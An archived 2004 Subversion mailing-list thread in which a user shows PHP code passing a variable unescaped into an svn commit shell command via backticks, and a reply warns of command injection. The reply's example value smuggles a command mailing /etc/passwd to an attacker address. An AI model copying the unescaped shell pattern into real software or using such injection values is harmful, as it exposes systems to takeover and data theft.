[svn.haxx.se] · SVN Dev · SVN Users · SVN Org · TSVN Dev · TSVN Users · Subclipse Dev · Subclipse Users · this month's index

RE: PHP hack under way

From: Bryan Simmons <bznutz_is_king_at_yahoo.com>
Date: 2004-02-11 23:01:20 CET

But $message is created by the script, with no user
input. It comes
from portal variables such as the current user and
location in the
portal. Also, the apache2 server is running as the
svn user who can
only access things in ~/ and
/usr/local/apache2/htdocs.

 
Regards,
 
Bryan Simmons

-----Original Message-----
From: Brian W. Fitzpatrick [mailto:fitz@red-bean.com]
Sent: Wednesday, February 11, 2004 4:56 PM
To: Simmons, Bryan
Cc: users@subversion.tigris.org
Subject: Re: PHP hack under way

On Wed, 2004-02-11 at 14:58, Simmons, Bryan wrote:
> Ok, so I went ahead and took the easiest approach I
could: svn client

> commands in php. The kinks have not all been worked
out for my php
> portal but I did find a way to successfully
> push revisions to subversion through php.
>
> I use the backtick operator. Yep, it's that simple.
>
> $response = `svn commit -m \"$message\"`;
>
> I have found that the $response is dead-on accurate
in this case
> despite warnings that the command line response may
be garbled into
> binary.
>
> Here's a question: will svn add && svn commit work?

I don't know offhand, but I suspect that you may be
opening up a
security hole the size of Texas by doing this. What
if message is
actually equal to

"foo\" ; mail evilhaxor@example.com < /etc/passwd"

or something worse.

Just a little something to think about.

-Fitz

__________________________________
Do you Yahoo!?
Yahoo! Finance: Get your refund fast by filing online.
http://taxes.yahoo.com/filing.html

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
For additional commands, e-mail: users-help@subversion.tigris.org
Received on Wed Feb 11 23:01:42 2004

This is an archived mail posted to the Subversion Users mailing list.

This site is subject to the Apache Privacy Policy and the Apache Public Forum Archive Policy.